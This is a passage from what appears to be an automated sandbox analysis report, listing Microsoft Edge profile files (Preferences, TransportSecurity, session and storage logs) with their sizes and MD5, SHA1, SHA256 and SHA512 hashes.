720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
238B

MD5
b0403198c5d81f3527ac11bff5b12e80

SHA1
7441a9f2c2a18611be8857780d736e5be4f0c0aa

SHA256
0c0e0360a59462b08e540d7f1e85978eb8d0b9123ee918ab473c9f8c41f152cd

SHA512
882b0db46bd20bb359675ec0f45159e7b86da233d1441c1d7426ad15e275eb9f24dc9295afe586e18e07e320186ce32aebe0078a06a5d3a232c55d852db3f7c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
f5a31ae4087b09a2cc297fb6c1ab2a37

SHA1
ea2fb090114fd75a018b2a1e049d6761c7eaf10a

SHA256
d55f12c683360fd9fbefea6c61547bdc0bf9f7fac8904a96156bc95a73dcf72c

SHA512
75b79f891431c6c3e9e87ad0c18f5baa60a6ff28711544a6e076058f69347b78b958bbe0fc99293d6c50b893d24f5b50d3bf31db592692fff2c915cde76d2e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
20KB

MD5
d6bc8ae734dc57b313ab40cfb0e81d75

SHA1
a903b4b04817a57130f2b65fd2ef73358f7b5d0d

SHA256
faab2dc6e0aaab3bc29ed19f497a56689b7549d00e4d0617763fc03d93c570fd

SHA512
6eb996493e70bfe192fcc6442a9b52bc81c41998151860481e00f55889788805ad07ff256e3b510fe9b97b7b2322726fc7a47314cd66cd2943f570df2d05ea7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
541B

MD5
dc16f544a642d7768be0ef93882d1aff

SHA1
f27f8959c626e2f359c9900ea96234d031b55db6

SHA256
d55fedb669e56c8c73f804a313d6520dfbc088ea40ef63b88978c755e7e4f937

SHA512
312ac5ee9354ac5f8638c6e0b7fa41554fafd34042bcc37408f397285272643990cd0e25a5cef5adaaeae75501dd69548497a4398830c75540f5711a35531c38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
22KB

MD5
2b7836ddd9437e7bef522dc19dee2d6d

SHA1
a31b1aa479392f036d9f29a0b2d63a72b5381f57

SHA256
209311d30b158181fee10bf9557cd49b06892355857edddfd1cfb5f409825180

SHA512
8595a9e99ad47e14522bb88d96e941542925be95d799f30167ffd0a808317d80356ce97bbbc1217c47e7bd73705c1e3b9b650cec7d60c1480b1fda023d98208a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
22KB

MD5
ae31ed54e0455f9bf68a695ec4a1e110

SHA1
d5eee3857b974865356566b557d7f5de18393f2c

SHA256
24bddd6ddfd4df6415a3900b44355b9f55b04f9a18b5a4e9e23f3a9a418b20d0

SHA512
a9a621fab8b90a2d8fd6eec31a4f60f6479b88879269cab62c13ef84ca223735c61d59af8f3508b9416c7c48fe5d41e189f2aba58fbaeaabafa7265378d87406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
18KB

MD5
9d86abb1b6b9f98344c6821b70bf2d56

SHA1
34379c9d05588f274fc201588ce296c23c7784e7

SHA256
5a2c1d3ab41216a41c0f1e0bee783483dc956fcacdebf80aa4d809cf1b887f54

SHA512
5bde5ea8d41d6947971f051bd19cbf57f532b6aaa4571a3e8034d3717314df19d80b635d0ea94fe90d1d972c5185f73dfd2f7dac17e661b9d6557238b5b84d0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
18KB

MD5
12535b0618e06017c0f6ec76216f83c9

SHA1
39404aa64aeb1962b16ffbb2503950afd69bc27b

SHA256
08c9a56654c25f4cd9cd891dd2ad3eff4522b595b071fa956de1308d6a633115

SHA512
320584798cbfaedf9e2fdf6a0f26464bee441b455fa25eac14e6829d474b9525b0e84a0cbcc43a39aec1399da17b7e2111e458365cccbfe2ff8732a58c7da67c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6d82d1baeb235a6f6f5e3174e2a9b8fe

SHA1
cc1fd51a3c312b1977051466418eda1d5685ed78

SHA256
32112a778e3c86e0b4d0dd42a16cbae397f659b2449923ce375396a45c75718e

SHA512
8db0d1c3c4aad02a66223a354bc60fced4d791e9f9d822ebdf04ab042ae9f4a0db11d07e021b8aa8f35689e7f9568a9749d0faa1fffc573d75647baba6a63cb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
82f19b0c6705bffc8a0e9ace222ad90c

SHA1
3ed6d15ba5f6aa2bf38f6b90661a6b873acad268

SHA256
e8b850dcea72ab530de9db8a2c019a22b5a67e808090a10556c8d64ed817f572

SHA512
d774da30c5a29b68ffc1f295934c4a194396a0323d21694372d601105bcc69b343ae2ff721e48996bc4fe955ca1059f1af124654dc0f0c5bfdd34eaab2a8f0c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3cea909b93be8cdb0bcbc16b5f1d9598

SHA1
feaaab2310159d6c5462353f36777b96a18c0447

SHA256
df9070b1223993e3728f156e3b41be5ce1dabb8008e41d607332211a4207864b

SHA512
9991d25325c7ecc69442c01108d38aaf6fbf48e2103c68aba59e6b41f05221c855c921e1dcae2f714162eefcb6e7656d47a73f22aa0a98dbbd38301d7ff8c330

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
2a9a8eb1d837fd534db918f698671fac

SHA1
c3bed78b7928054999900cc1632c0fdef74ec467

SHA256
964e0e9bdf377a23210527a3436ce826147a616fdb5ae58a237f70a80671e703

SHA512
a71e0586b9d42f00690821a7889b810ee84dea202dc408fdbd39a8ee5d70e55e39af519ccd565715a1de835f8c694110e3061926f6292c4e247e27bbce150240

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
19KB

MD5
639af23125643c9c2dcf43e9ebfb8af2

SHA1
5c95c586c4dabb1ecf00afb422c5060b0673da57

SHA256
740d0500cb4000cce26c2014600c7b06f9c9c2ea12a3f0f38d5dfa33be952f67

SHA512
ac0b2c7f560da91c09037af35cc9c881f6b7426efc59d657657bb83ebc704ea312a42445ad57c1532a93be39862d463493df59fd36b8063256c87447ff241834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
20KB

MD5
01be319096fe1fe3315188b789f11084

SHA1
c5960cef76ed21a6c6d22f501bc7b81695c35029

SHA256
b7f09e3f9552a69f1e7b87b8400ff4f3a08d437f6f0cf20212f61fe35f2c0ef1

SHA512
759ae5e19b1d30891fad32ee539fcde549a2ab513749380d7d45e7ae6278e9536e599259b99fec86e39d856a121e0feda10d50357b5899f971c89b20b0ce8ed6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
19KB

MD5
4eaf09b6b5c9ebfaf2e53dce60cf3d0b

SHA1
3da68364790eff1e2685109fd6f92c7eaee37226

SHA256
ad4261fb1cd31a77577c8844a488545af39b3b61be215882d19a34b6d6b23e94

SHA512
77acbc519d4bbe805584b329b5e1a1c926cc621beafe820e182616f7a86605ceda20fc133f74e2353b558f24a79d313000467ce65a43ab04d1fe7331e6541f3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a3e0791370e8713d3f92e9be7748e287

SHA1
1a1fd72b9c4cb647ef2704eb4718b241b189a6a7

SHA256
fc8fca2f4dc1389785293698be0a6c9895732987921694bd5d590cb667e95d36

SHA512
1f5444386bbfcffcb2cb839e05441851b7db87a3c57de8e568fe43875d8731a5dbbca4a85cc0ab9bc1ee8920818abfc1c1e10fa0ba7f4e23baa2b032dc94cddb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
18KB

MD5
905b0ef8555154143643d28d6ec777a0

SHA1
cac7d21226398ae0a7330a7f75939c78c27f9ed6

SHA256
39aee2cdfaf270cd461c1fd5191d9380a86866069db64139c828e71c70d3039e

SHA512
9bbe51acf60287b9e795c19efd44a12ef6601f6c0d122cca7c041d7524db7705ebf7f4f059c3d40aa2855a5bae83cb3dcb26c6cab821d5bc26608a88666331f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
10KB

MD5
51c9feb055ade386d7c969683c3bdf8b

SHA1
5b07054a3ca872226326f82c8befb95ef4863904

SHA256
e3b9102842ddbd5020193ff8be23678e9aa47e54957736d355e39266ece02535

SHA512
a0e0e99414aee6be28c45bcbe00ecedbd42e1bf6adac6fa6d541d1a3be078063e81f1e2b991af92e1fc07b5c9cd32c0352eed99e4e8c74992ba4d691291f6d3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
20KB

MD5
f2f4789de26d35d8bfaa29161953eed8

SHA1
9d2bef71e26a8dbe32605136d3665e63d3f956f5

SHA256
3ca203fb3803d334d0dee9db62a21e404af412df391bf3f3a8f7372fa543c77b

SHA512
a5fbc6ffab6a29ee94b2b4e7a5adf255d4068972997b6f7df0187c76d626cc34b82b3411e5bb87389d5be5f3e83221da96193b0e2c0bc1befbbb0c8b1f5514a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
17KB

MD5
48c6bef2ec5c3616e05efb8036741cff

SHA1
7f2996a50ce2625b6ee79021292db6b2fb39a070

SHA256
53747cfdf2b170b217ce7191ac2314bc8e17015236e812721a88b7ad53d6d8f1

SHA512
cd036ce232c9cd4480f513a45a1eb401bfd4f56f348a1c8b0309cd1efd592e6b796c7afdbb781bca450d79ddf5a633e976d7729766d0a8084d71261ae3e72068

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
20KB

MD5
b8310ca4a486e81ce66fd32c9f71b68b

SHA1
254ffc72464f3aaf1cb0ff0cae7f31858be0063b

SHA256
0406107c51e7fbdf221f1cda97f4c789e6527ed37e9069102388193c6b35bc52

SHA512
a2e2dcb40ef85cc67839cf35569941871680bf002f6b18a2edd8b364cf059ae49267047fb12108aadf52b28210478955656bdc75bc6eac699abea3f25bf8debc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL

Filesize
36KB

MD5
e9ec9d81757e59ac60c3f07bdc76dece

SHA1
7a826b98e490ec96b4840c48c2417b5748185c60

SHA256
1be98799b697a00952d9e910ff6bd6e16f9a7ef198c7d76ca4e08abdb83015df

SHA512
fdbea9cd2dd5ae42b21824695ec095a99d7773a2e7d6be9a24c7780a299c34351c60f47b488148b8115f399c92756e11f080fe2103549248bbe18fbddb8a8edc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Reporting and NEL-journal

Filesize
28KB

MD5
dabaf8286a56fade647a6c85bc3f2ae5

SHA1
739aa210c7f24b993f33904c27c601271db5c913

SHA256
5a9985cc0e4ddc4c76f83525610a6388124b0ab8050d1cadba18ef24d5898037

SHA512
a4e82daae6232d388bccaad663b655c5600dbbea44e0d6c7cb316e49c5e1e5fe13ea849ab9d088417f17525e54dd074c965b277f48fc010d3c2c8954f528563a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
a1b160ab2c1568eb16b9fb98b9ad91bb

SHA1
8865b8855a008f50b7fb2340b96136381061e893

SHA256
12d5bd41d06ea56d35d45417e4ee46c929238e167cf8fd581e66ef61267029eb

SHA512
efa7e1e227b660623e8ab88959aa181c1193bd5445e99c902119302d6feac76c4ee7abe9cb93b9ed20a810a4a4e23b309f7a3d7e90c1982d26f21190f574c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a5bdd.TMP

Filesize
48B

MD5
8063d04f89892f5b7edeca6438bbfbc1

SHA1
c948a86fa8e81a17acb812f345fea8d7832adb50

SHA256
82226290dbf52f9f85672c09e8ca1f3f708b64655674971a1f9e614b862e7e83

SHA512
b9cfdcd354b2f0e34e3dc306a5791cbe88f335bf7d3335f31be66009725712c1bc539d8231091458fb3167e89563a9af460450f24f17e2c9b0aa2fdf458cd242

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
137B

MD5
a62d3a19ae8455b16223d3ead5300936

SHA1
c0c3083c7f5f7a6b41f440244a8226f96b300343

SHA256
c72428d5b415719c73b6a102e60aaa6ad94bdc9273ca9950e637a91b3106514e

SHA512
f3fc16fc45c8559c34ceba61739edd3facbbf25d114fecc57f61ec31072b233245fabae042cf6276e61c76e938e0826a0a17ae95710cfb21c2da13e18edbf99f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
2a86e0025637ed296a5958d670a4fee7

SHA1
76f4f0c88e0575e638f0917c9560662d27011349

SHA256
9977306ca8fc881710a590d3b0723f9eab130f353b51ee07419ee56e2400ad54

SHA512
a9efbb9619a5dc94660a51b0d4d14f84bc2fdc5d5720649d5345f18f28262cfb63bf6d788edc4a63fcf97d497a186826aed9701226bc492e084ca7b5e4e7e8d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13371084374113527

Filesize
1KB

MD5
ec7ca77ed649a5ed07ae0e415bfc8eee

SHA1
20816cdca0e9f827621122604ccb2488121e0c92

SHA256
54eeed300e4149785db2459848426fdac9b77e9ab5866fc2e5a865c8dd0eba27

SHA512
b41df0c77ee027dbfd0cb737f07e5651e621010f8c35fd0102b26b3c4281f2a11c29adf9095e0c93049adf287a48575d6c96e40f258168db0881d514a0cfdafd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13371084609895286

Filesize
22KB

MD5
7e5eb29b653f0479bcce8e443a1e1787

SHA1
873fd35819a45d4468b7dedba6c5b9807b4bc914

SHA256
76962e3d05e7f5b1b81e2d9402c64eb1fac9d3631c5c99dcf517b6f8eb2bc9de

SHA512
8f19514088594730697f910bb346f4e6cede39e4f18c4ed7c6ac692273a7b25ffe10149eff0776bd895ae8ecd9c15752766edbbcb3ee0e0a908a3bfcc14750fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13371084374353527

Filesize
1KB

MD5
e85045433316cb2a6c79835cffae1922

SHA1
ddc4a09ed1327518e1fcbfd2557d1ea0bd45868c

SHA256
e93c3d0242bfea2492843f1bdca9143427cc3acae1b052abcb84cb7d243dc6d3

SHA512
0581343f8d9a66aa738ee9bee02f083b63ca18b755b5a135e5011e2de08978fff55874a66b1f18f857f9ab3166a8113611b5375fa6fd2f01c2a527f90bf4ada6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
350B

MD5
969d20e2ef5721dca4ae05f4f96184b9

SHA1
358d38a24ef3b481531aedeba47b6e2f8decae45

SHA256
2a29c03061f5f40850bfa139fc8ed94d10f9c34652ee998c55d3295b8516aa47

SHA512
f6d2cf2649db5ec9221732c15463bea6d7e375a5d610c268854962eebe62765120fbc946608c392b38f951f159b5c449595e094aeca740f228860e2d9992f553

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
fe1bd61bd18fd35df8bb38dc1ed56293

SHA1
7947bc91d4701857641986633526a031f6466a9a

SHA256
9d3fbf9a2c6c5a3f027b5655cd2a09dea88dc4849c667cdc6e25cc3e2a832083

SHA512
dd248db17d37dd190618bac04ce559a8d6ea52e97ccdc6c924599d3dd31abfbd6b51d20d3688e646337caa4e9448a1a7067844acbe0e6a35c04abe3924198ea2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
c8d6c900e0ec9c6319f1a266709f445f

SHA1
5bc79f3df860615c91c9c5ba18564d7642263fa9

SHA256
2b5774390342da2f27f7f7e0c8b04a06f3f1bd85b846eddb40580afbc46dd50d

SHA512
00449f484cf6389a479ca323b1e59c0a34134d2186c676563d2e74b3effa6f3f10a3b071f5f27e804a5aa63df757cb3476786c11800373d8726e29ef2b413bda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
24abf7195a9dba4237460558a6ad4eec

SHA1
96fc1642a530db430a894b00e9df8df648f4aa45

SHA256
5ad698438b44826f6dcbcb5fa727d12f856b4b211cb3b2f433040fdf48bc406e

SHA512
e6c8b74ad0785adbae4526b0867c139f4085fbd33c01a5fe683d2344926b6066cebd166e4e8fe1d2a68cd7a62dca6345bd15e8aa248ae7a1e1d09cc698b9ef82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
9c2b3d23ea71726ee15e0db033580838

SHA1
262252da38512909aa381e86aed50eb9ff0e24fc

SHA256
7a6b5c97b43f0d60e76335eb5f58d064b4c626ac6452adf2eb27a19b6dbe0d3e

SHA512
45ee3a6fe31f01680505c03779ef252b687dff745d335d920c3d96d4ea09450fa35afffb1f4628c9ba29463daf4f334ffc643771873ad75267b3188ba0e6bd02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
75783a0f55a87136f52a943fb1aeec65

SHA1
ac2542e62b76d6361a205769e881c7d3980dc982

SHA256
dd97e27628f80951ad3ae18baffa232eb33e472ba49998a0ad37d10efb6c40ba

SHA512
863a10e750c5f3dacfb11035ebdc54599027994ae3f052f4bad074e8ed22b413264b79fa8830326b476b83a2d20633e7e8f25dc86093e14aca7d724fa29e71d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
afb0006f84036e5c27f83878c1568712

SHA1
68735db6088b3b1beac0acc0a5d611c61003e790

SHA256
bb7fdcfe05397d5bfd2675290583128be8b24f558add7e9b7b41cc6de39f8e76

SHA512
a43b4922d8e46e8f47539a42aae163850d4972f17108803f1b58aff220d80facfd986d5ea6c60fcc185efc3356a350b940a90105e71589f3e28882ca077b723b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
bcb845c66b6116d7657956c136413e67

SHA1
c828ec3a851fd39be67ac8f7c6eb4dadfbf7f6cb

SHA256
2c8b8de1ad1d19095a15ad5c7b838fbf3ef176e2e60447716090d47a56d9b2ff

SHA512
5df52231e67536aedfd6cbedb96326d16a5bc385a12ad823a189b8bf9d293a48d64af5b39e20886703d1cd053f5cfa5bc27d29fbc32380a3a4f4973a28fa6491

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
d15d2cf36f279c586a61b929c779e5a4

SHA1
b04c15f91d1c3ab5fae55b816906925f1086bb6e

SHA256
744ffe8be7f67bd1b33d68e6d0efec46a0719558bb21094f6b1eea87e522d432

SHA512
2651bbed3d667fc961c81adb239f8069ddcc064ddae83109e225bc4fcc8e698a49c6aea34d3a14a48196d3ce10dd41ff1fc5b9adc599625fb4df042d18e28307

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
e26f7ed39a40a8b5807989a91e6f74c3

SHA1
ee555590de63e425b661aae123d6b66d8141088e

SHA256
440584730bb78d5e2f048c82214aa057fd944ac054c5631ace62e3e4be4814c2

SHA512
a93f470e64056cd8b5eb4c77b51d954428d9ed7bf2b4cf9e5be6068025b9129bce5e5269f1b8ddf22f2126781d212d1731ef6ca9e0ee46121ea6af1730b65046

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
9512294a6141f4a9b20258ef8b2c1859

SHA1
0efe6ea00c5585a0ae6f43cf1d6fa9f308a1ceb3

SHA256
3344be7cd162f03c6d128b6299c138eca1e3dfad387f5d6c97d32f29840d2387

SHA512
10e9553ae07fbbc89b92aa35700c5a1e5dc6dd7766bf3eaa9e6457f26fd02ccbe13aa80c6adc60ec4f22d036656dd9e74815eceed02d3a57f15cce46d9953e69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
2855fd138c015b5c1fc2ddaa020612c4

SHA1
2096f6c33187664fc516dec0953fb7c6ac457ee7

SHA256
25c1c4a2c0f365526ba8dd5b15029f01613e83ed479661d4320ee0784df0d11d

SHA512
bfd14c37afbe15bc2604e2487f67f86bb4c051d2962dcc4a393021dbd254147f03a690dac33fc7abdb107858af8f566c654ebf41de362c3c6f6d7dde9ec6f5d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
876B

MD5
386a9f5f8516e755e9ddb4755da66d49

SHA1
86a3de598534e1ff649baf155b425cad4476e0f2

SHA256
7d16d76d539ca16c7c5badcc40283b383b48ea513970794117fa7f09211fd7ad

SHA512
6daafb1a888ff14d7e2c07a7deeb8aee236490e1df0f722e1d8ec029a0df10369d7f91bc594e0ca7858ebbea89a746b461c0542aefdd66bebc2422426c2526be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
4e6aa1f1a61dd82e66373d5387af9bb2

SHA1
b8b5474ed123242a9770ed1c1db295a27aa59436

SHA256
04e66d559f05f0d413ef4bb805b41fdacbc503ae7fa826a8e66db31ee2096d95

SHA512
6cc40de48dddf0a4cc8bfdedca8304ae4146ec99680a8a61440f127f1ab9efd8918d4dc5c09b87285b2187ad33c223156841afda03d10bbde8250232746f50a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
9b717de1798c26974b094ce0fe2e6b3a

SHA1
5420648a0c591a4b2e7f004078622f60bb2bedcd

SHA256
9e937ce896e5628f6752270669de7e5e7b019fc28cb721cdd675ca68c32078a1

SHA512
8b6fa07729f1e74fa083f2c4a9cc67de43da35ef133798ddf708c168ee27725e491c64548053ba200fdd780877cbf9f540f1dc30aa347d219512b228d3e8542c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
f5652f53d8d3930d6dde5c72e12e3d66

SHA1
92a5156fc029fffabbf272a998e8242300022dab

SHA256
9eab1d591aaa007b479c5767e1ef9c7119476e264f00ac7d6dc9cd29448a4ccf

SHA512
dd334be1a7080fdef4f324ea0070efe6dad67b02aeb79f1c92a947073fc459d14fa2e8ee0517f8d3b10398f50ca3a1badc3cd100a1ab5e80777ab3f592c2c794

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
358df8b8452a5957d4075d77afbf88b8

SHA1
7d9e5ef2fd3efc3074f44d876354ef8feb769a5f

SHA256
78cbb2833735f5a2ee959ae9a3e68dd60957fc7ef791d6bbf531d3c12e9dd336

SHA512
5f17be63f18060b32e3b40f3da3523c7bb8b6291474780656fec5c0c1dcc58e2ba454a008585c89a10c466a016c0f8a7c346e11cb317ad5e651092714fbf5a48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
873f1e5ed795bc3f5556a3c679497f0a

SHA1
6a67521a89e729784a6c7d760db1fc414f94a50b

SHA256
f2c300fbb973ac82594c2cc7fbb166afe0bef08da41708f7b4127fb89d2e60b8

SHA512
edd8b5819685587e51122e8bd83c26dcd29155fe71c7543eb20e17681f1ba70a66154b050a12228a15d9ce52e567f3dcdd9a6301aab6e893ccb367c67a4bc121

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
a0c5abe86985fc8d77719c3403acdcf6

SHA1
39fde3496e1980652488658f343194ad7fe395f6

SHA256
3128854e7f1a062992c928da5b6bcef9d6bc705b1467655728ae9253bb629ad4

SHA512
d38b1700e5e72a7693b6aab818ca97b1f271f115097836da3fbf769f4c1758a10c939614a484c31b68dbbb2b507fd5a355ce93fc043d584765204cbbb3eca219

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
e30dc127abd5009a930e3303b749db06

SHA1
1c71e6d8c2b3a735c7a76269852787d615ffb9e9

SHA256
f2f7abb06a9e041aedd1ae3899e0002de85baced7145c1c5b8256cd3b34ac48f

SHA512
337aea09e3244f5476d384c9d5be7f589404c8323768b62f660f9df001c6d88ee7f31deb3211f80650ee76db1617e14f83ae04632510b04b81be3e2ec631b3a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
7KB

MD5
3494b22324d4ae54f4d54fdd5ea27620

SHA1
ce21c7f6e637b63774f9c12ba10def9e950e5fd6

SHA256
02a98d0b9416b5541beefbf1719f1c44606881e059241ae8dad3e53bb7fac474

SHA512
63729d22e81da8dda3cc3c2f353d57c0e7f54273636577be1a653d0e7d030b1a0292f2034af76c617478f93c5a804ff15bc0e793fc198254791f66d13fa77a1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
6KB

MD5
36b9119ac71fa15055f352dce10d7009

SHA1
cc050b213c085c254c0beb4c2e9db1dcb4a1cecf

SHA256
63883bf40ca0d8c141c69c1baff03b6bbad988cb8316defade39557302d55f58

SHA512
3d1744102dbd42453f4d26d2a24fb2dcc5e8b32310092a55ff947a06f61ba4fc0e342f06c2770b91fe8581383622ca921cf70b7ab82a4792b8b8438b038edf92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
afbe727c05b88b55239e49ddacd70718

SHA1
4cb80e49083dec20d87a7cb81a4d438f3803750b

SHA256
6404d5990fa2a090b746341025ea6da13a1016242f352388f0ac499a46fe18ff

SHA512
d73a39ff677c5e5cb5dd241523caaabc12ba56eb6a868e1cd719f2e38e8c11a0be90c86ef6790e91d856072976e54451a0c28b3ca46eb5f42cc8c32cc06f83e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b2814c63-25f2-4a1b-8eb8-dc410fc36fb2.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\c8f38b29-6545-4c2f-8516-93683177cb35.tmp

Filesize
7KB

MD5
c301c2d6372879bd1029c504bff70a92

SHA1
74cd9b846d8678ac07c15126ed8bb17cbc789e0d

SHA256
4ef0d790a8069343292ddd37ba5a6cd0c4780dc90272acb599b4c43a7ae6b8a0

SHA512
6b45d9365477d205cf9ef2912888d717a01386a29c9c152f1f498c986539ddcecccd923cb0ebcff0c63766e9e92d605d54c9343097dfd36adcc9cd31c425d4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Filesize
2.7MB

MD5
f1d3249454834f7be4117115b5a8e5b9

SHA1
47f69e61c6b3d087c35e8ff584cc0235e4807144

SHA256
e5070b7028de198d1bdb48efbae7b402f8c26e3e8beeee4a1b11d3511107f400

SHA512
65c1784b2f3a39928dcfa57267cc25abc75b95c4b241aff30f00ed53e740cbd51c7b65bbb8bdba0033f1aff8d407c15b9bc967f41d88080fc0754d950d15ef3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
319B

MD5
